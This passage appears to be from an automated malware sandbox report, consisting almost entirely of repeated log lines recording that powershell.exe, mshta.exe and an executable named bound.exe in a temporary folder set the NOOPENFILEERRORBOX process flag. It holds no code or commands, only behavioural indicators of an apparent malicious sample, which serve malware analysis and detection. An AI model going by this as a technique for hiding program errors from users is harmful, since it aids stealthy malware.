                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
